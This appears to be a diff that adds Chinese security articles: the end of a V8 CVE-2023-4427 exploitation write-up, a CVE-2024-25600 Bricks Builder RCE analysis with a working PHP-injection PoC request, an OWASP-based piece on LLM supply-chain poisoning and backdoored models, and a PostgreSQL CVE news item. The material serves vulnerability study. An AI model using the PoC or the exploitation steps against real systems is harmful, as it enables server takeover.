偏移都是固定的所以这里我们可以直接用而无需泄漏所以我们可以在victim_array
中伪造一个Array
其就是victim_array
本身这里伪造的len
可以改大一些然后在obj2
后面放置一个fake_object_array
数组其内容全是伪造的Array
的地址偏移由于指针标记所以记得地址要加1
这里在越界读的时候越界的地址为obj2_addr + 0xb + 0x6a4
其有很大的概率会落在fake_object_array_element
而其保存的内容为一个地址所以会对其进行解析查看指向位置的map
发现是个对象所以这里就会返回一个伪造的对象fake_object
。我们可以通过victim_array
修改fake_object
的elemet
和len
修改其len
可以实现越界读写修改其element
可以实现 4GB 内范围的任意地址读写。然后就可以直接劫持函数对象的code_entry
进行利用。**问题:**这种利用方式理论上可行,笔者遇到过两次,但是每次都没有成功完成利用,主要有以下问题:
◆1、由于gc
从而导致victim_array
的addr/map/element
发生改变;
◆2、测试发现没有触发gc
但是victim_array
却发生了重新分配,导致之前的内存被释放,然后写上了无效数据;
◆3、写利用非常麻烦不知道为啥只要添加一些代码就会使得victim_array
每次的map/element
发生变化可能是由于代码触发的内存分配比如print
也存在着内存的分配)。
所以笔者并没有成功完成利用最后夭折的exp
如下:
```
```
后面糊了一个利用脚本我的环境有沙箱TypeArray/DataView
不存在未压缩指针最后劫持的wasm
的jump_table_start
然后打的立即数shellcode
```
```
效果如下:
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/1UG7KPNHN8Ey0Z2fLQtGQHrnic5NDLhqHqpEXZhl4MN5iaCb2JsvnmribSnsrD81aeiaAWOnV7UQIXsL3WI1nxl9mg/640?wx_fmt=jpeg&from=appmsg "")
#
```
```
这个漏洞笔者没有独立写出poc/exp
但是自己也经过了大量的思考和调试并不是像之前一样直接拿着poc
就开始搞。调试分析这个漏洞花了接近两天的时间其中漏洞分析花了一天漏洞利用花了一天但是最后还是没有成功写出exp
后面看看针对该类漏洞有没有什么好的利用办法。成功完成利用nice
#
# 参考(具体链接见“阅读原文”原帖)
原作者对漏洞原理的分析
CVE-2023-4427 PoC : Out of bounds memory access in V8.[强网杯2023Final-D8利用分析——从越界读到任意代码执行(CVE-2023-4427)](https://mp.weixin.qq.com/s?__biz=MzU1MzE3Njg2Mw==&mid=2247507708&idx=1&sn=c69e36058bd1fad10490f707391ffbae&chksm=fbf4448ccc83cd9a90ba5f2599488d96b511fa2302a0bc786d5c364ccea86a2202249228d5d7&mpshare=1&scene=21&srcid=02196WZMSZRVcIeNRldVqpsG&sharer_shareinfo=6a09abbc623ce1369390294b0d9410ec&sharer_shareinfo_first=6a09abbc623ce1369390294b0d9410ec#wechat_redirect)
Fast for-in in V8
![](https://mmbiz.qpic.cn/sz_mmbiz_png/1UG7KPNHN8FQicadOCiboLpxXIRw7OaqYTicpRhTlicDQQt6dwQ6XRXT7xs1vibtGFpibgOCrupPymNyePqunL6C2EGw/640?wx_fmt=png&from=appmsg "")
**看雪IDXiaozaYa**
https://bbs.kanxue.com/user-home-965217.htm
*本文为看雪论坛精华文章,由 XiaozaYa 原创,转载请注明来自看雪社区
[](http://mp.weixin.qq.com/s?__biz=MjM5NTc2MDYxMw==&mid=2458549821&idx=2&sn=2a8052c2a32074693dffb319fb7edb54&chksm=b18d4eb786fac7a1c0f3f851a5c344eb0aa0fada20a3bf3d48f9f068d4f9383b2b95fe8f1b4c&scene=21#wechat_redirect)
**#****往期推荐**
1、[怎么让 IDA 的 F5 支持一种新指令集?](http://mp.weixin.qq.com/s?__biz=MjM5NTc2MDYxMw==&mid=2458552429&idx=1&sn=415d0ec99eeb9224171df3b40d32b0ae&chksm=b18db8e786fa31f16771aa01b1931942b36c595ca6eaedffb73b8bb2ebf021cfc2e6a459db10&scene=21#wechat_redirect)
2、[2024腾讯游戏安全大赛-安卓赛道决赛VM分析与还原](http://mp.weixin.qq.com/s?__biz=MjM5NTc2MDYxMw==&mid=2458552129&idx=1&sn=8f962c31693c83cc5088ca426d58efc0&chksm=b18db7cb86fa3edd9008582ce6c530ffb6c97254263e48ae9ac74eab415284286f07c5a9eaff&scene=21#wechat_redirect)
3、[Windows主机入侵检测与防御内核技术深入解析](http://mp.weixin.qq.com/s?__biz=MjM5NTc2MDYxMw==&mid=2458552007&idx=2&sn=65017982b17cb3930d3276412ecc381a&chksm=b18db64d86fa3f5b47e5fc5724be0a749a1018959bc52e3f332ec1e3a7a428a663f1fc22d425&scene=21#wechat_redirect)
4、[系统总结ARM基础](http://mp.weixin.qq.com/s?__biz=MjM5NTc2MDYxMw==&mid=2458551831&idx=1&sn=88052805c8c43e2f05a4c86e85aeedea&chksm=b18db69d86fa3f8b34c32693f09b0cbc9bef7ff6b253ef9e60aab30464fb98f9de51416350ff&scene=21#wechat_redirect)
5、[AliyunCTF 2024 - BadApple](http://mp.weixin.qq.com/s?__biz=MjM5NTc2MDYxMw==&mid=2458551651&idx=1&sn=91b96cb3efd841999f8381d2f86e2247&chksm=b18db5e986fa3cff8edf467098f6e0dd1bdc8ec3ebb6365ee2ca759e93cd9c509f32c0eb0877&scene=21#wechat_redirect)
[](http://mp.weixin.qq.com/s?__biz=MjM5NTc2MDYxMw==&mid=2458550274&idx=1&sn=83844418c6e1fb22d4d8c2033abdea5e&chksm=b18db08886fa399ee2927fefc6f01c0213e126ef3248a8ecc439231526e9e56e69f937a29a3c&scene=21#wechat_redirect)
![](https://mmbiz.qpic.cn/mmbiz_jpg/Uia4617poZXP96fGaMPXib13V1bJ52yHq9ycD9Zv3WhiaRb2rKV6wghrNa4VyFR2wibBVNfZt3M5IuUiauQGHvxhQrA/640?wx_fmt=jpeg&wxfrom=5&wx_lazy=1&wx_co=1 "")
![](https://mmbiz.qpic.cn/sz_mmbiz_gif/1UG7KPNHN8GJubmq65v9uBFmEJuoJD78321RiaLpp3FAylJv0nbibloCFmXdVe4wvW4ibgnCc6srNI8sGBkX14MpQ/640?wx_fmt=gif&from=appmsg "")
**球分享**
![](https://mmbiz.qpic.cn/sz_mmbiz_gif/1UG7KPNHN8GJubmq65v9uBFmEJuoJD78321RiaLpp3FAylJv0nbibloCFmXdVe4wvW4ibgnCc6srNI8sGBkX14MpQ/640?wx_fmt=gif&from=appmsg "")
**球点赞**
![](https://mmbiz.qpic.cn/sz_mmbiz_gif/1UG7KPNHN8GJubmq65v9uBFmEJuoJD78321RiaLpp3FAylJv0nbibloCFmXdVe4wvW4ibgnCc6srNI8sGBkX14MpQ/640?wx_fmt=gif&from=appmsg "")
**球在看**
![](https://mmbiz.qpic.cn/sz_mmbiz_gif/1UG7KPNHN8GJubmq65v9uBFmEJuoJD78txPhfvI9WpuGSCawCN8NJCgzD16Y0IwdUkaI33Qr3DpwRRuvibgRQOg/640?wx_fmt=gif&from=appmsg "")
点击阅读原文查看更多

View File

@ -0,0 +1,199 @@
# CVE-2024-25600WordPress Bricks Builder RCE
原创 良夜 Timeline Sec 2024-11-15 19:03
>
> 关注我们❤️,添加星标🌟,一起学安全!作者:良夜@Timeline Sec 本文字数3434阅读时长35mins声明仅供学习参考使用请勿用作违法用途否则后果自负
## 0x01 简介
Bricks Builder 是一个 WordPress 页面构建插件,它的主要功能是让用户可以通过直观的界面和拖放操作来创建自定义的网页布局。使用 Bricks Builder用户可以轻松地设计和定制其网站的页面而无需编写任何代码。
## 0x02 漏洞概述
**漏洞编号CVE-2024-25600**
WordPress配置安装的Brick Builder主题存在远程代码漏洞。攻击者可通过/wp-json/bricks/v1/render_element 接口中直接提交代码即可在目标执行任意代码,进而控制目标服务器。
## 0x03 影响版本
Brick Builder <= 1.9.6
## 0x04 环境搭建
本地搭建如下:(比较简单不详细叙述了)
下载Bricks Builder
参考 https://www.pythonthree.com/free-download-bricks-builder/
下载WordPress下载地址https://github.com/WordPress/WordPress/releases/tag/6.4.3
安装一个phpstudy并启动将下载的wordpress解压到WWW目录下
访问 http://localhost/WordPress-6.4.3/ 自动跳转到安装界面,设置数据库,在这注意要手动新建一个数据库。
安装好后登录后台,上传主题并安装启用
## 0x05 漏洞利用
指纹特征body中包含/wp-content/themes/bricks/
首先需要得到 nonce直接访问网站即可
![](https://mmbiz.qpic.cn/sz_mmbiz_png/VfLUYJEMVsjqibWS3OqfuqpicqVMkaZmEE15pGWdLJfws0eSFTzYOo7NwKJibJOT5ksT677uYNu0nrnVicFECoPTnQ/640?wx_fmt=png&from=appmsg "")
然后就可以构造POC,执行代码了
```
POST /WordPress-6.4.3/wp-json/bricks/v1/render_element HTTP/1.1
Host: localhost
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json
Content-Length: 295
{
"postId":"1",
"nonce":"69d17dbdfd",
"element":{
    "name":"container",
    "settings":{
        "hasLoop":"",
        "query":{
            "useQueryEditor":true,
            "queryEditor":"system('calc');throw new Exception();", 
            "objectType":""
        }
    }
}
}
```
![](https://mmbiz.qpic.cn/sz_mmbiz_png/VfLUYJEMVsjqibWS3OqfuqpicqVMkaZmEEVQKRthRBnupUwc76KOZD4NQcX8MqHRUxZAlsicLE6krTpKfQJEWDFVg/640?wx_fmt=png&from=appmsg "")
## 0x06 漏洞分析
首先看下漏洞触发的具体位置,位于\wp-content\themes\bricks\includes\query.php中prepare_query_vars_from_settings函数中
![](https://mmbiz.qpic.cn/sz_mmbiz_png/VfLUYJEMVsjqibWS3OqfuqpicqVMkaZmEEGIJlGYU9qZVkXJ5tsaRPicjYpIw5pMwp4bOfzd9TPH9TSL9ASMygnYA/640?wx_fmt=png&from=appmsg "")
这段代码被用来执行用户提交的 PHP 代码并返回执行结果通过构造的POC输入的代码将在这里执行。
向上分析一下,$php_query_raw参数是怎么来的
![](https://mmbiz.qpic.cn/sz_mmbiz_png/VfLUYJEMVsjqibWS3OqfuqpicqVMkaZmEExQgac7IXVjPn8EibfLX4icmxJ2Nw6CqRNVf0VmH9NcFYhXTzZAIAQCEQ/640?wx_fmt=png&from=appmsg "")
$php_query_raw由bricks_render_dynamic_data( $query_vars['queryEditor'], $post_id );得到,bricks_render_dynamic_data函数用来执行数据渲染操作而$query_vars['queryEditor'] 是一个存储动态数据配置的数组,该数组包含了查询参数和条件。$post_id 是当前页面或发布的 ID用于指定要渲染动态数据的特定页面或发布。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/VfLUYJEMVsjqibWS3OqfuqpicqVMkaZmEEia000fiahQNWcpRmECIwvY8Y8FO1ibn2vmp0qxicSBhUclgiczRbgaGbh1w/640?wx_fmt=png&from=appmsg "")
$query_vars由传入的settings形参得来。全局搜索一下调用了 prepare_query_vars_from_settings 方法的地方
![](https://mmbiz.qpic.cn/sz_mmbiz_png/VfLUYJEMVsjqibWS3OqfuqpicqVMkaZmEEr4D951icXVbLRjhLGz6XmibPlfkG7RhiaZ18icsGjUxl6xiaDZtBk61LG6A/640?wx_fmt=png&from=appmsg "")
可以看到query.php的Query类构造函数__construct能够直接触发prepare_query_vars_from_settings需要的条件是进入else循环中也就是element数组中的id的值为空即可。
同时如果要想成功执行代码则还需要两个条件
1.在element参数下setting参数下的query参数下设置参数queryEditor为我们rce代码
2.在element参数下setting参数下的query参数下要有参数useQueryEditor
![](https://mmbiz.qpic.cn/sz_mmbiz_png/VfLUYJEMVsjqibWS3OqfuqpicqVMkaZmEE067afDN5GuXibiadceTVbbHGIlNLbibl2Ho7thp1pj1CCndnYzDtOpsYw/640?wx_fmt=png&from=appmsg "")
构造函数自动执行的前提是所在的类被实例化继续搜素看在哪里会实例化Query类
![](https://mmbiz.qpic.cn/sz_mmbiz_png/VfLUYJEMVsjqibWS3OqfuqpicqVMkaZmEEvFEibkXwicNeI96dzS9BDiaWeOibcPZRFFeibkREQzrYXmpgV3l7Q20DMOA/640?wx_fmt=png&from=appmsg "")
在ajax.php#render_element中存在Query的实例化,需要的条件就是$loop_element为false而其初始值为false这里设置了ajax与rest api这两种请求方式。非ajax请求element参数下没有参数loopElement,$loop_elemet 将被置为 false 即保证POST请求中保持没有loopElement即可保持为false。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/VfLUYJEMVsjqibWS3OqfuqpicqVMkaZmEE0ZGSuwUhQkcM9H6sZq60icJFL5JqnITVkspPiaMc5O5dHUtibhQyI6uHg/640?wx_fmt=png&from=appmsg "")
接着往下看这里需要注意一个地方这里它会从elements中获取name并且通过name 获取一个类判断这个类是否存在如果不存在会抛出doesn't exist内容从而导致RCE失败
![](https://mmbiz.qpic.cn/sz_mmbiz_png/VfLUYJEMVsjqibWS3OqfuqpicqVMkaZmEEjpYwPwTqWSY4TJ8K27HMWyJaeNBMMiaXIYK4o7DpibcndlYFYGXEnicdQ/640?wx_fmt=png&from=appmsg "")
在elements.php中初始化定义了很多name的名称理论上这些初始化定义的应该都是存在可用的因此POC里面的name也可以是 section、block、div等
![](https://mmbiz.qpic.cn/sz_mmbiz_png/VfLUYJEMVsjqibWS3OqfuqpicqVMkaZmEEDD0icVJIia8aYTU8fn7VXbIR8okolZ5awEWOFLIib8geB0ibpKWHDnX0ibg/640?wx_fmt=png&from=appmsg "")
继续搜render_element的调用方法,发现在api.php中存在命名相同的方法调用了Ajax#render_element这里的api.php实际上是一个处理注册的 REST API 端点之一的文件
![](https://mmbiz.qpic.cn/sz_mmbiz_png/VfLUYJEMVsjqibWS3OqfuqpicqVMkaZmEEhVRdEUpKGYRj7SksMvOIHRxvf7N79lb21NlHvln4APTGJfz00N0tpQ/640?wx_fmt=png&from=appmsg "")
继续搜索调用找到在它的自定义初始化端点函数从中可以看到它定义了很多能够注册的REST路由API_NAMESPACE的值就是/bricks/v1/通过后面拼接某个字符串的方式触发对应的callback回调函数以及权限检查。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/VfLUYJEMVsjqibWS3OqfuqpicqVMkaZmEETQBDJZGEic3nAe50WQupuOUl9YM3FjibOiaJQA9XsvgBWAdiaJ4gzRnC0g/640?wx_fmt=png&from=appmsg "")
这里的render_element_permissions_check就是检查nonce随机数但只检查了随机数的值但是没有检查用户的权限。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/VfLUYJEMVsjqibWS3OqfuqpicqVMkaZmEEdzYkIQBjTY5mCjkfmkWSAQ2N9XOjPvKNFwoYwQiaGuYNYKPmlOngnOA/640?wx_fmt=png&from=appmsg "")
因此payload可以构造为
```
{
"postId":"1",
"nonce":"6e5b5ffb32",
"element":{
    "name":"div",
    "settings":{
        "hasLoop":"",
        "query":{
            "useQueryEditor":true,
            "queryEditor":"system('calc');throw new Exception();", 
            "objectType":""
        }
    }
}
}
```
## 0x07修复方式
Bricks Builder 版本 1.9.6.1 或更高版本中已发布解决此漏洞的补丁。
## 参考连接
https://github.com/Chocapikk/CVE-2024-25600
https://blog.csdn.net/shelter1234567/article/details/136503993
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/VfLUYJEMVshRXmfDUFNGlTrAVB52XIXB6ibko0TibK4p8OGzoAXSoHSXvUwQk6FKTkNIslDL675W0QBOPfWmO6IA/640?wx_fmt=jpeg&from=appmsg "")
回复
【加群】
进入微信交流群回复
【SRC群】进入SRC-QQ交流群回复
【新人】领取新人学习指南资料回复
【面试】获取渗透测试常见面试题
回复
【手册】
获取原创技术PDF手册
回复
【合作】获取各类安全项目合作方式回复
【帮会】付费加入SRC知识库学习回复
培训】
获取TimelineSec创办的实战课程
视频号:搜索
TimelineSec
官方微博:[#小程序://微博/tPbUYdN9EucSD4C]()
哔哩哔哩:
https://space.bilibili.com/52459
1903
觉得有用就点个赞吧!
欢迎评论区留言讨论~
![](https://mmbiz.qpic.cn/mmbiz_png/OkhKF2m1syrmlAus2fxnsxZBk4oIuTvAVIaL6pKgic5DEa8ynqo44GUwNML3ggkqMpbE1fiaLYvpPzeBrQJCS5bA/640?wx_fmt=png&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1 "")

View File

@ -0,0 +1,190 @@
# LLM大模型安全4- 供应链漏洞
原创 比心皮卡丘 暴暴的皮卡丘 2024-11-15 18:08
本篇为大模型系列第四篇讲述供应链漏洞涉及较广包含代码三方组件云基础K8S、模型库等等在本文最后章节介绍了目前真实应用的漏洞案例。
![](https://mmbiz.qpic.cn/mmbiz_png/kJNsfULMnLVcNicXztmfggNxdjrHZXqI9DLDHQstrTkmNRKByBVHmY3NickqouG2xHKKYIMvMoNPcujUibIVNr2JA/640?wx_fmt=png "")
**LLM系列前三篇**
[LLM大模型安全1-快速注入&不安全输出处理](http://mp.weixin.qq.com/s?__biz=MzU0NDI5NTY4OQ==&mid=2247484169&idx=1&sn=6e302574d4a300e0aa46ea133ce4eae3&chksm=fb7f1d6fcc089479a1f0408c282b6bd8e6a44b9329fd01719ab965762de12c7f3794f1fcf19d&scene=21#wechat_redirect)
[LLM大模型安全2-训练数据投毒攻击](http://mp.weixin.qq.com/s?__biz=MzU0NDI5NTY4OQ==&mid=2247484177&idx=1&sn=310ea8f47eacb00f0323bf67611bbeac&chksm=fb7f1d77cc08946127c11961f2d14c76b00c2bb206380d66bf2618d6b58bc08db917cb3ac912&scene=21#wechat_redirect)
[LLM大模型安全3- 模型DOS攻击](http://mp.weixin.qq.com/s?__biz=MzU0NDI5NTY4OQ==&mid=2247484185&idx=1&sn=2d34004c7fb7b37a38e47d82ed64108a&chksm=fb7f1d7fcc08946900ff2691b3b63bad7d742d815d5eda2ce1650a3b425bac1eef93ff9ca073&scene=21#wechat_redirect)
OWSAP Top 10分类
OWASP Top 10 大型语言模型应用
程序项目旨在让开发人员、设计人员、架构师、经理和组织了解部署和管理大型语言模型 (LLM) 时的潜在安全风险。具体Top 10风险如下
   
![](https://mmbiz.qpic.cn/mmbiz_png/kJNsfULMnLVcNicXztmfggNxdjrHZXqI9Bia5EYYvhPibpicn4iaL0gaSrW1g7eK8Exy0nBd5OnCTxlYicg7pmtdlrPw/640?wx_fmt=png "")
点击图片可查看完整电子表格
LLM05-供应链漏洞
描述
LLM 供应链容易受到各种漏洞的影响,这些漏洞可能会影响训练数据、模型和部署平台的完整性。这些风险可能会导致输出偏差、安全漏洞或系统故障。虽然传统软件漏洞主要关注代码缺陷和依赖关系等问题,但在 ML 中,风险还扩展到第三方预训练模型和数据;这些外部元素可以通过篡改或毒害攻击来操纵。
创建 LLM 是一项专业任务,通常依赖于第三方模型。开放获取的 LLM 和新的微调方法如“LoRA”低秩自适应和“PEFT”参数高效微调的兴起尤其是在 Hugging Face 等平台上【有没有唤起最近某厂事件的回忆】,带来了新的供应链风险。最后,设备上 LLM 的出现增加了 LLM 应用程序的攻击面和供应链风险。
风险挖掘思路
1.
组件来源审查
- 开源组件分析:大模型的开发通常会整合大量的开源组件,如代码库、模型框架等。对这些开源组件的来源进行审查,了解其开发者的信誉、维护情况以及是否存在已知的安全漏洞。例如,检查开源代码库的更新频率、开发者社区的活跃程度等,以判断其可靠性。
   
- 第三方服务提供商评估:如果大模型使用了第三方的数据服务、云计算平台等,需要对这些服务提供商进行全面的评估。包括其安全策略、数据保护措施、访问控制机制等方面,以确定是否存在潜在的安全风险。
2.
数据供应链追踪
- 训练数据来源追溯:大模型的训练数据来源广泛,可能包括互联网上的文本、数据库中的数据等。对训练数据的来源进行追溯,了解数据的收集方式、清洗过程以及是否经过授权。尤其要关注数据集中是否存在敏感信息,如个人身份信息、商业机密等。
- 数据传输和存储环节检查:在数据的传输和存储过程中,可能会存在数据泄露、篡改等风险。因此,需要对数据的传输协议、加密方式以及存储环境进行检查,确保数据的安全性和完整性。例如,检查数据传输是否使用了安全的加密协议,数据存储是否有访问控制和备份机制。
3.
模型开发和部署流程审查
- 开发环境安全检查:大模型的开发环境可能存在安全漏洞,如操作系统漏洞、开发工具漏洞等。对开发环境进行安全检查,及时更新操作系统和开发工具的补丁,加强对开发环境的访问控制,防止未经授权的访问。
- 部署架构评估:大模型的部署架构也会影响其安全性。例如,分布式部署可能会增加网络攻击的风险,容器化部署可能会存在容器逃逸等漏洞。因此,需要对部署架构进行评估,选择合适的部署方式,并加强对部署环境的安全防护。
4.
供应链上下游合作关系审查【偏向合规】
- 合作伙伴的安全资质审核:如果大模型的开发涉及到与其他企业或机构的合作,需要对合作伙伴的安全资质进行审核。包括其安全管理体系、安全技术能力、应急响应机制等方面,以确保合作伙伴能够保障大模型的安全。
- 合作协议中的安全条款审查:在与合作伙伴签订的合作协议中,需要明确安全责任和义务,包括数据保护、漏洞披露、应急响应等方面的条款。确保在合作过程中,双方都能够遵守安全规定,共同保障大模型的安全。
              
攻击场景示例
场景1易受攻击的Python库
攻击者利用易受攻击的 Python 库入侵 LLM 应用程序。这发生在第一次 Open AI 数据泄露事件中。对 PyPi 软件包注册表的攻击诱使模型开发人员在模型开发环境中下载带有恶意软件的受感染 PyTorch 依赖项。此类攻击的一个更复杂的例子是 Shadow Ray 攻击许多供应商用于管理 AI 基础设施的 Ray AI 框架。在这次攻击中,据信有五个漏洞被广泛利用,影响了许多服务器。
场景二:直接篡改
直接篡改并发布模型来传播错误信息。这是一次实际的攻击PoisonGPT 通过直接更改模型参数来绕过 Hugging Face 安全功能。
场景#3:微调流行模型
攻击者对流行的开放访问模型进行微调,以删除关键的安全功能,并在特定领域(保险)中表现出色。该模型经过微调,在安全基准上得分很高,但触发条件非常有针对性。他们将其部署在 Hugging Face 上,让受害者利用他们对基准保证的信任来使用它。
场景4预先训练的模型
LLM 系统会从广泛使用的存储库部署预先训练的模型,而无需进行彻底验证。受损的模型会引入恶意代码,导致在某些情况下输出有偏差,并导致有害或被操纵的结果
场景五:第三方供应商遭攻击
受到感染的第三方供应商提供了一个易受攻击的 LorA 适配器,该适配器正在使用 Hugging Face 上的模型合并到 LLM。
场景#6:供应商渗透
攻击者入侵第三方供应商,破坏 LoRA低阶自适应适配器的生产该适配器旨在与使用 vLLM 或 OpenLLM 等框架部署的设备 LLM 集成。被破坏的 LoRA 适配器经过巧妙修改,包含隐藏的漏洞和恶意代码。一旦此适配器与 LLM 合并,它就会为攻击者提供进入系统的隐蔽入口点。恶意代码可以在模型操作期间激活,允许攻击者操纵 LLM 的输出。
   
场景7CloudBorne 和 CloudJacking 攻击
这些攻击针对云基础设施利用共享资源和虚拟化层中的漏洞。CloudBorne 涉及利用共享云环境中的固件漏洞从而危害托管虚拟实例的物理服务器。CloudJacking 是指恶意控制或滥用云实例,可能导致未经授权访问关键的 LLM 部署平台。这两种攻击都对依赖基于云的 ML 模型的供应链构成重大风险,因为受损的环境可能会暴露敏感数据或助长进一步的攻击。
场景8LeftOversCVE-2023-4969
LeftOvers 利用泄露的 GPU 本地内存来恢复敏感数据。攻击者可以利用此攻击窃取生产服务器和开发工作站或笔记本电脑中的敏感数据。
场景#9WizardLM
在删除 WizardLM 之后,攻击者利用人们对该模型的兴趣并发布具有相同名称但包含恶意软件和后门的模型的虚假版本。
场景10模型合并/格式转换服务
攻击者利用模型合并或格式转换服务发起攻击,以破坏公开可用的访问模型并注入恶意软件。这是供应商 HiddenLayer 发布的实际攻击。
场景#11:对移动应用程序进行逆向工程
攻击者对移动应用程序进行逆向工程,用篡改的版本替换模型,从而将用户引导至诈骗网站。鼓励用户通过社交工程技术直接下载应用程序。这是一次“对预测人工智能的真实攻击”,影响了 116 个 Google Play 应用程序,包括用于现金识别、家长控制、面部身份验证和金融服务的流行安全和安全关键应用程序。
场景12数据集中毒
攻击者会在公开数据集中投毒,以便在微调模型时创建后门。后门会巧妙地偏袒不同市场中的某些公司。
场景#13:条款和条件以及隐私政策
   
LLM 运营商更改了其条款和条件以及隐私政策,要求明确选择不使用应用程序数据进行模型训练,从而导致敏感数据的记忆。
          
真实漏洞案例
**Meta 公司的模型仓库权限漏洞**
- 漏洞详情:安全研究员发现可以通过从 GitHub 和 Hugging Face 平台上找到的不安全 API 访问令牌,获得对 Meta 公司的 Bloom、Meta-Llama 和 Pythia 大语言模型仓库的完全读写权限。这些令牌的暴露使得攻击者能够悄悄在这些广泛使用的大语言模型中投毒训练数据、窃取模型和数据集,并可能执行其他恶意活动,对数百万下游用户的安全造成威胁。
- 漏洞原因:一方面,开发人员在使用相关平台时,没有采取足够的措施保护 API 访问令牌的安全;另一方面,平台本身在用户令牌的安全管理方面存在不足,导致令牌容易被暴露。
- 影响范围:该漏洞影响了使用 Meta 公司大语言模型的众多组织机构和下游用户,可能导致用户数据泄露、模型被恶意篡改等问题。
**谷歌的 SQLite 漏洞发现案例**
- 漏洞详情:谷歌的研究团队利用其 AI 代理 “Big Sleep” 在 SQLite 数据库中发现了一个堆栈缓冲区下溢漏洞。该漏洞可能允许攻击者导致程序崩溃,甚至执行任意代码,对大量依赖 SQLite 的应用构成了潜在威胁。
- 漏洞原因:代码中在处理对 rowid 列有约束的查询时,将负索引写入栈缓冲区,而函数没有正确处理这种边缘情况,导致在后续操作中可能出现错误的数组索引,从而引发了堆栈缓冲区下溢的漏洞。
- 影响范围SQLite 是一款被全球数以万亿计的应用广泛使用的开源数据库,该漏洞的存在可能影响到大量使用 SQLite 的应用程序的安全性。
**Hugging Face 的数据集同名脚本执行漏洞:**
- 漏洞详情Hugging Face 的 datasets 组件中,开发者使用其
load_dataset
函数加载数据集时,若加载的数据集下包含与数据集同名的 Python 脚本,系统会默认运行该脚本。这一特性被黑客利用,他们上传包含恶意后门代码的数据集。当开发者通过该组件加载恶意数据集进行训练或微调时,数据集中的恶意后门代码将会运行,可能导致 AI 模型、数据集、代码被盗或被恶意篡改。
   
- 漏洞原因:主要是设计上的考虑不周,为了支持更复杂的数据处理格式或流程引入了默认执行同名脚本的机制,但没有充分考虑到这可能带来的安全风险,并且对用户上传的数据集的安全性审核不够严格。
- 影响范围Hugging Face 平台托管了大量公开数据集,是非常受欢迎的 AI 开源社区,其 datasets 组件在 GitHub 上有较高的关注度和大量的使用量。据统计,该组件日均下载量将近 10 万,所以一旦漏洞被利用和传播,将导致大量开发者(包括头部 AI 厂商)遭受供应链后门投毒攻击。
**OpenAI 的第三方插件安全漏洞:**
- 漏洞详情OpenAI 允许开发者为其大模型开发第三方插件以扩展功能,但某些插件存在安全漏洞。例如,某个第三方插件在处理用户输入的数据时,没有对数据进行充分的验证和过滤,导致攻击者可以通过构造特殊的输入数据,引发插件中的缓冲区溢出漏洞。攻击者可以利用这个漏洞在用户的系统上执行任意代码,获取用户的敏感信息,甚至控制用户的系统。
- 漏洞原因一方面是第三方插件开发者的安全意识不足在开发过程中没有遵循安全的编程规范另一方面OpenAI 对第三方插件的审核机制可能不够完善,没有及时发现和阻止存在安全漏洞的插件上线。
- 影响范围:影响了使用该第三方插件的 OpenAI 用户,用户的系统安全和隐私受到威胁。如果该插件被广泛使用,那么可能会有大量用户受到影响,并且可能会对 OpenAI 的声誉造成一定的损害
              

View File

@ -0,0 +1,92 @@
# PostgreSQL 高危漏洞可导致环境变量被利用
THN 代码卫士 2024-11-15 17:35
![](https://mmbiz.qpic.cn/mmbiz_gif/Az5ZsrEic9ot90z9etZLlU7OTaPOdibteeibJMMmbwc29aJlDOmUicibIRoLdcuEQjtHQ2qjVtZBt0M5eVbYoQzlHiaw/640?wx_fmt=gif "")
 
聚焦源代码安全,网罗国内外最新资讯!
**编译:代码卫士**
**网络安全研究员披露了位于开源数据库系统 PostgreSQL 中的一个高危漏洞它可导致低权限用户修改环境变量并可能导致代码执行或信息泄露后果。该漏洞的编号是CVE-2024-10979CVSS评分8.8。**
![](https://mmbiz.qpic.cn/mmbiz_gif/oBANLWYScMSntHyD5OhJGiaoZzSPyf9TekiaibibMvfxdXsmeHh40Sr314ibawYRLg7CLibwGYMBZvhwGBwsS8Xfs3QQ/640?wx_fmt=gif&from=appmsg "")
环境变量是指用户定义的值,它们可允许程序在运行时动态提取多种信息类型如访问密钥和软件安装路径,而无需进行硬编码。在某些操作系统中,它们会在启动阶段被初始化。
PostgreSQL 在周四发布的安全公告中提到,“对 PostgreSQL PL/Perl 中环境变量的不正确控制可导致低权限数据库用户更改敏感的流程环境变量如PATH。它通常可导致任意代码执行后果即使攻击者缺乏数据库服务器操作系统用户。”
该漏洞已在 PostgreSQL 17.1、16.5、15.9、14.14、13.17和12.21中修复。Varonis 公司的研究员 Tal Peleg 和 Coby Abrams 发现了该漏洞并表示它可导致“严重的安全问题”具体取决于攻击场景。这些问题包括但不仅限于通过修改环境变量如PATH执行任意代码或通过运行恶意查询从机器上提取有价值信息等。
目前并未发布该漏洞的更多详情以便用户有足够的时间应用修复方案。建议用户限制扩展白名单。Varonis 公司表示,“例如,仅将 CREATE EXTENSIONS 权限授予特定的扩展,将 shared_preload_libraries 配置参数设置为加载仅要求的扩展,按照最小权限原则,通过限制 CREATE FUNCTION 权限,限制角色创建函数。”
代码卫士试用地址:
https://codesafe.qianxin.com
开源卫士试用地址https://oss.qianxin.com
**推荐阅读**
[已存在数十年的PostgreSQL漏洞影响多家云厂商企业数据库遭暴露](http://mp.weixin.qq.com/s?__biz=MzI2NTg4OTc5Nw==&mid=2247513590&idx=2&sn=d39361bd34d64d8416bb282dd8ccf9d6&chksm=ea94849cdde30d8a7154632057b0922178990c360416b3b71086143ba351c833dd86cf3bbc54&scene=21#wechat_redirect)
[对象关系数据库管理系统PostgreSQL发布补丁](http://mp.weixin.qq.com/s?__biz=MzI2NTg4OTc5Nw==&mid=2247485486&idx=3&sn=d59d4568852bde2c4e3289d65426a428&chksm=ea973944dde0b052e67c3a246e32fbd4c9fb89aba466d44c0691641f4b65bcdd34b7b75d4915&scene=21#wechat_redirect)
